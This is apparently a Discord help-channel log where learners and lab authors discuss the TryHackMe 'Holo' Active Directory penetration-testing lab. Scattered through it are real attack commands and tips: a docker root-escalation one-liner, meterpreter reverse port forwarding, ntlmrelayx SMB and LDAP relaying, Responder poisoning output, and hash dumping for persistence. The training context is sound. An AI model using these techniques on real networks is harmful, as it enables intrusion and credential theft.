question: in task 16 we are given the second IP right away (||from the internal network, 192.168.100.1||) in the example code snippet - did I missed something ||or the IP that we are provided 192.168.100.1 is the gateway IP from the networking knowledge?|| I can get the private ip of the current environment I'm in with ||ifconfig||, that I'm aware of

#

also on my server ||/dev/tcp doesn't exist, nor anything is returned from nc scan|| - does it mean somthing went wrong and I should reset the network?

austere grotto
#

Im having issues with task 37. I was able to get the hash which seemed to work on SMB for PC-FILESRV01 but not WINRM for PC-FILESRV01

pulsar field
austere grotto
hollow steepleBOT
#

Gave +1 Rep to @pulsar field

livid shoal
#

protocol? 👀

#

rdp?

keen venture
#

Has any one done the docker privesc (Task 20)? I think I know what I need to do, just not sure how to execute it or construct the syntax. I'm thinking make a dir on the host, then mount the docker to it, giving me root?

keen venture
#

Why would this not work with the SUID bit set?

#

docker run -it -v /:/mnt alpine chroot /mnt

#

Do I need to build my own docker image first?

pulsar field
#

and in your docker command -check GTFOBins- is the sh missing at the end

keen venture
hollow steepleBOT
#

Gave +1 Rep to @pulsar field

keen venture
#

The box is down. I will try later.

woven lava
#

In task 39 we are asked the names of the monitoring and the logging software but both Seatbelt and SharpEDRChecker fail tor read some drivers or something

#

How do I get the answers? 😦

wind bobcat
nocturne rover
#

what is your opinions about holo network?

#

idk i find it sometimes like jumping to a topic and not explain it well just my opinion atm

lone spruce
#

If you find something like that then just tell us and provide us feedback so we can improve it

nocturne rover
#

well i didnt write it in an offensive way just my thoughts

lone spruce
#

neither did I. We just want to make the best experience possible so if you think an area needs work just let us know

nocturne rover
#

well i will complete the room and then provide feedback where i can write my feedback?

lone spruce
lone spruce
#

@wind bobcat Im just putting this here for now. If you want to move it I dont care

fading jungle
wind bobcat
#

it shouldn't because it's a socket

#

it's not a file or a directory

#

it's a physical device

fading jungle
#

but.. but "in linux everything is a file" 😛 I though this would be the same

wind bobcat
#

it is, but it's not

fading jungle
#

ok, so I gues everything is ok, and probably nc doesnt work here and I should scan with different technique

woven lava
#

Hey guys, need a little help with the name of the vulnerable application found on PC-FILESRV01

#

I got the Scheduled Task thing

#

But "which one"

austere grotto
#

I couldn't find it when I listed the scheduled tasks, even after restarting the whole network a few times. I went to check the windows event log and apparently it is bugging out.

#

Like failing to start because it is still in progress, and there were multiple instances of the vulnerable application running

woven lava
#

So how did you finally narrow it down?

austere grotto
#

the pictures in the tryhackme page actually says the name of the vulnerable application

#

the next part is figuring out where it is

#

im still stuck in the part of hijacking, tried running the binary locally and renamed my dll multiple times to the different missing dll names and still cant pop the covenant :/

woven lava
#

I am still lost on this part

austere grotto
#

oh yea , i meant finding which directory does the vulnerable application reside in

austere grotto
#

if u got the name of the vulnerable application, u can do a simple windows find based on that name

wind bobcat
#

tree /f

#

good command

austere grotto
#

oh right that

wind bobcat
#

just dont do that in the root of a filesystem

#

lel

austere grotto
#

:X im kidding i kinda bumped into it manually

wind bobcat
#

iirc it's in a desktop

lone spruce
woven lava
#

Like I can gather it from the hints

lone spruce
#

research, testing

#

approach it as you would any other application you dont know what it is

#

You know its vulnerable because we have presented it in such a way

#

but approach it as you would anything else, research it see if it has any low hanging fruit, test it see if you can find any vulnerabilities, etc.

woven lava
lone spruce
#

Okay

#

TLDR: the scheduled task is automation

#

in the real world a user would click the application

#

the scheduled task is emulating the "user"

#

However, I believe the scheduled task question comes before the DLL task which is an oversight on my part. I need to look at it on my free time and see what I can do to fix it

woven lava
#

I used the powerview script to enumerate the Scheduled tasks but this application wasn't listed there

#

Also, how would you put this bit in a pentest report?

lone spruce
lone spruce
#

you could then provide references, remediation, etc

woven lava
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

wind bobcat
#

just an fyi for anyone participating - currently no one has submitted a report

#

odds of winning are 1/1

woven lava
wind bobcat
#

Obsidian, Open Office, whatever you want as long as it looks presentable

woven lava
#

Thanks @wind bobcat. I'll be right at it once I compromise this last machine. A Pen-300 would be a real pain off my student debt xD

hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

woven lava
#

When's the deadline though?

#

For the Pen-300?

lone spruce
#

It’s specified in the task

austere grotto
#

any tips to get the SMB connection after having started the NTLMrelayX? Can't seem to be getting anything :/

lone spruce
#

where exactly are you stuck? what have you tried? What exactly are you experiencing. Try to be as detailed and as verbose as possible

austere grotto
#

On PC-FILESRV01, I've disabled and stopped both lanmanserver and lanmanworkstation and rebooted. Verified that the port was closed and the service no longer runs.
I also have a meterpreter connection to PC-FILESRV01
I did portfwding via this session using portfwd add -R -L 0.0.0.0 -l 445 -p 445 (command from the room page)
I ran the autoroute module to add 10.200.168.0/24 to my msf's routing table and also ran the socks_proxy module on my machine port 9050, with version set to 4a. This is so that I can reach the DC using proxychains. Verfied that I can reach the DC.
Configured my proxychains with only this: socks4 127.0.0.1 9050 so that I can the socks proxy I configured.
Started my NTLMrelayX by doing: proxychains ntlmrelayx.py -t smb://10.200.168.30 -smb2support -socks
Currently waited for quite a while, still no response :/

wind bobcat
#

you started running NTLMRelayX before adding the port forward, right?

austere grotto
#

err after

wind bobcat
#

i've experiemented and it seems like it has to be done before

woven lava
#

In Task 46 the Syntax is given as sudo python [Responder.py](<http://responder.py/>) -I <Interface>. Wont it be http://IP/?

wind bobcat
#

@lone spruce did you change that?

wind bobcat
#

task has been updated

woven lava
#

Okay thanks

#

Am on it right now 😄

lone spruce
wind bobcat
austere grotto
wind bobcat
#

if you open Wireshark on PC-FILESRV01, do you see inbound SMB requests?

austere grotto
#

there was no inbound SMB requests

#

Just resetted

wind bobcat
#

you should see responses every minute or so

woven lava
#

So, in the syntax ntlmrelayx.py -t ldap://<IP> -smb2support --escalate-user <user> I put in the IP of DC-SRV01(which has the SMB port open) and the user ||watamet|| but it keeps erroring out. Any reasons why? (I am doing this on my attack box while I have Responder running)

wind bobcat
#

the command you have there was a demo

woven lava
#

Aah get it

#

Thanks man.

wind bobcat
#

next task has the actual commands

woven lava
#

Almost there. Hopefully the stupid questions would stop soon.

austere grotto
#

hmm I just restarted the network and after getting shell on FILESRV, i opened wireshark on FILESRV and still saw no SMB connections

#

Can I check which IP is performing the SMB connections ?

woven lava
#

When it says restart the network what does it exactly signify? Restart the whole network or just the DC

#

Just go shutdown /r?

wind bobcat
#

When the network resets, it physically resets all the machines back to the AMI we provided THM

#

when it says restart, it means restart PC-FILESRV01

#

there should definitely be inbound SMB requests coming from S-SRV02, I think the best advice I can give is reset the network

woven lava
#

I did shutdown /r on PC-FILESRV01 and am waiting

#

I feel like I am a Morty here

austere grotto
#

i takes a minute i think

woven lava
#
$ proxychains smbexec.py -no-pass HOLOLIVE/SRV-ADMIN@10.200.114.30
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[proxychains] Dynamic chain  ...  127.0.0.1:1080  ...  10.200.114.30:445 <--denied
[-] [Errno Connection error (10.200.114.30:445)] [Errno 111] Connection refused
#

😦

#

The last hurdle

#

Also [-] SOCKS: Don't have a relay for 10.200.114.30(445)

wind bobcat
#

you can access 10.200.114.30, right?

#

without having to proxy any traffic through anything?

#

I personally recommend using sshuttle over chisel for this bit

woven lava
#

I have sshuttle running

wind bobcat
#

and in ntlmrelayx, if you run socks do you see a session?

woven lava
#

But I get this in responder as well:

[*] [LLMNR]  Poisoned answer sent to 10.50.111.6 for name tun0
[*] [LLMNR]  Poisoned answer sent to 10.50.111.6 for name tun0
[*] [LLMNR]  Poisoned answer sent to 10.50.111.6 for name tun0
wind bobcat
#

You don't need responder running.

#

you just need to follow tasks 47/48

woven lava
#

I did that :))

wind bobcat
#

and you still have responder running, which is an issue and not at all required

#

in the NTLMrlRelayX console, do you see any inbound sessions?

woven lava
wind bobcat
#

it should look like so

woven lava
#

Okay wait, I am getting an error

wind bobcat
#

I'd you don't see that, then I'd recommend restarting PC-FILESRV01, Start NTLMRelayX, and after that is setup, pop a Meterpreter shell and portforward.

If that doesn't work, my suggestion is restart the network

woven lava
#

This error in between is sus

#

I got rid of the error

lone spruce
#

it says the problem

#

address already in use

woven lava
#

Yeah, I had a server hosted

#

I set up portforwarding using meterpreter with portfwd add -R -L tun0 -l 445 -p 445

wind bobcat
#

it must be 0.0.0.0

woven lava
#

That must be it

#

Yippppeeeeee got it

wind bobcat
#

good thing you mentioned it, haha :p

woven lava
#

Had to reset the network

#

Gotta go back to hijacking dlls

wind bobcat
#

side note

#

the local admin hashes are the same

#

so if you dump hashes, you'll have persistence

woven lava
#

Wait, so after getting rdp on PC-FILESRV01 using ||watanot's creds||, and getting Admin, I dump the hashes

wind bobcat
#

yep, then you can regain access to FILESRV01 with ps/smbexec

woven lava
wind bobcat
#

ye

woven lava
#

So correct me if I am wrong, I can then technically directly gain access to Admin using watanot's NTLM hash?

#

I'm sorry, my windows is weak

pure saddle
#

im stuck on the same thing when i try to psexec i get " Errno Connection error (10.200.133.30:445)] [Errno 111] Connection refused "

wind bobcat
woven lava
#

Aah sweet. Got it.

#

Just that last flag

wind bobcat
woven lava
#

Also, if we have sshuttle running, do we need meterpreter portfwd?

wind bobcat
#

yes

pure saddle
#

yep i do

wind bobcat
#

the reason for the portfoward:
You're listening to traffic coming in on PC-FILESRV01 port 445 and redirecting it to your local port 445

wind bobcat
pure saddle
#

chisel

wind bobcat
#

so you'd need 2 proxychains

#

1 config file for pivoting into the LAN

#

2 config file for NTLM Relay

#

which is why I recommend sshuttle

pure saddle
#

oh my

#

ok ok thanks a lot

woven lava
#

New Error 🙂

#
[-] Authenticated as Guest. Aborting
[*] Opening SVCManager on 10.200.114.30.....
[-] Error performing the uninstallation, cleaning up
#

Finally!

pure saddle
#

congratulations dude ! im still fighting

woven lava
#

You'll get there king.

#

It's report time

#

Just two report related questions: Is it bad practice to copy the verbatim of the Offsec report and are diagrams required?

wind bobcat
#

Diagrams not required

#

i'll say use your best judgement on the offsec report

#

do what you'd do irl.

lone spruce
#

I WANT DIAGRAMS

#

booooo

night widget
tough ginkgo
#

I'd need some advice on task 28. The text says "Now that we have successful authentication to the web app we know that we have an upload page" but I can't get to a working web app on S-SRV01 except a login page .. Is it me or there's something wrong with the instance ?

wind bobcat
tough ginkgo
hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

lone spruce
#

you need to bypass the login page

#

Wait what the heck

#

why is that flipped around

#

@wind bobcat someone is definitely messing with things because those tasks are flipped for some odd reason

#

also I just went to fix the scheduled task bit. Did you already delete that question?

livid shoal
#

👀

gloomy ravine
#

Any hints on how to find vulnerable application?

lone spruce
#

Just do some manual enumeration it’s pretty obvious once you find it

livid shoal
#

u get a reset every hour ig?

woven lava
#

Hey, when enumerating the network initially, I see this 10.200.x.250 host up. What exactly is this?

woven lava
#

What's that?

#

I'm just curious

fading jungle
woven lava
#

Aah thanks man :D

#

And sorry for being repetitive

pure saddle
#

Everything is working fine proxies ntlmrelayx etc... but secretsdump gives me The attempted logon is invalid

#

i tried cracking Administrators hash but i get exhausted, i used the net user stuff

#

but i always get invalid logon

#

this thing gonna drive me crazy

pulsar field
pure saddle
#

i cant add them with psexec i get STATUS_LOGON_FAILURE

pulsar field
#

Try smbexec as alternative, without an admin user secretdump want work. You don’t need to crack the admin hash , for evil-winrm ,.. you can use the hash..

pure saddle
#

a yes also, i cant login in with evilwinrm

#

tried that

pulsar field
#

With the domain admin hash you can, that’s why we run secretdump…

pure saddle
#

technically and theoretically yes but for some reason it will not let me, i will reset the network somethings going wrong

#

i dunno

#

thanks for your time

nocturne rover
#

hello on google colab task for password cracking does it cost anything to use it?

woven lava
#

@wind bobcat @lone spruce can I DM anyone regarding the report?

#

Just some stupid formatting questions

nocturne rover
#

is it safe to auth to this app?

tough ginkgo
lone spruce
austere grotto
#

Regarding the PEN-300 prize, is it possible for the winner to swap it for something equivalent? Like AWAE ?

livid shoal
#

or a thm sub for 9-10 years xD

#

😂

glacial temple
austere grotto
#

I see, thanks for clarifying!

vestal furnace
#

Can Anyone Help Me? IDK whats wrong

#

Do we need to install both dotnet-sdk and runtime or just SDK??

summer radish
#

The error is perhaps caused due to system locale conversion or translations methods not available.

woven lava
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

wind bobcat
#

but we'll cross that bridge when it comes to it

austere grotto
#

I understand, thanks !

dapper idol
#

Exepct for the john and hashcat part, the holo network could be done with a raspberry?

wind bobcat
#

I don't see why not

dapper idol
#

Only need patience, to install packages and covenant.

feral crow
#

Thanks to the creators of “Holo”, an excellent lab that I really enjoyed, especially the attack vectors of “DLL Hijacking” and “remote NTLM relay”, just thank you!

livid shoal
lone spruce
potent perch
#

I I'm struggling at task 12 Q3

#

any HELP!

#

I'm not good at web

#

What I suppose to do?

lone spruce
#

@potent perch that file should have already been found in task 10

bright osprey
potent perch
#

HELP - TASK 13

#

I tried this command and nothing interesting returned

#

I HATE WFUZZ

lone spruce
#

Did you make sure that the cookie is stored

wind bobcat
#

^

lone spruce
#

it requires authentication

potent perch
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

upper rock
#

@quiet raft ^

#

Oh sry Jabba dealt with it

zenith delta
#

admin.holo.live is incredibly slow im not sure is it because someone is brute forcing it or what

#

but I cannot even log in to the web panel

#

could be someone changed the password lol

gleaming eagle
#

It's not normal for svchost to run on ports like 7680 and 5040 right?

#

shouldn't it be dynamically assigned?

#

unless its an rdp connection